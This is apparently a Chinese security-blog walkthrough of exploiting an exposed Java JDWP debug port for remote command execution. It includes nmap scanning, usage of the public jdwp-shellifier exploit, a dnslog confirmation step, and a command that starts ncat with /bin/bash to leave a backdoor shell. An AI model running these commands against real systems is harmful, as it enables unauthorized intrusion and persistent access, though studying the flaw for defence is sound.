java JDWP调试接口任意命令执行漏洞

java JDWP调试接口任意命令执行漏洞_第1张图片

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维fa2636fba406232c3941429321a3b273.png

让我们每天进步一点点

简介

JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,该漏洞可以被黑帽子直接利用进行非法活动。

java JDWP调试接口任意命令执行漏洞_第2张图片实战

下载exp:

https://github.com/IOActive/jdwp-shellifier

使用方法:

python jdwp-shellifier.py -t 目标主机ip -p jdwp运行端口 --cmd "Your Command"

使用nmap扫描目标nmap -sV -p 1-65535 目标ip  发现端口2424使用java Debug

java JDWP调试接口任意命令执行漏洞_第3张图片

开启一个dnslog来确认命令执行

java JDWP调试接口任意命令执行漏洞_第4张图片

使用exp进行命令注入

java JDWP调试接口任意命令执行漏洞_第5张图片

查看dnslog 发现命令已经执行成功

java JDWP调试接口任意命令执行漏洞_第6张图片

当然也可以直接开启一个后门使用nc进行连接

python jdwp-shellifier.py -t 127.0.0.1 -p 8000 --cmd "ncat -lvvp 1234 -e /bin/bash"

这个漏洞经常出现在云环境部署后开发人员粗心大意没有关闭调试接口或者没有配置访问控制的情况下。漏洞原理啥的就不啰嗦了。

往期内容

灭世之Apache Log4j2 远程代码执行漏洞

CFT学习资源与工具上新

工具篇-BurpSutie Pro 2021.10.1最新版本

327f942b1e2cead93299d412c2a78797.gif

java JDWP调试接口任意命令执行漏洞_第7张图片

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗java JDWP调试接口任意命令执行漏洞_第8张图片      

你可能感兴趣的:(java,linux,安全,docker,android)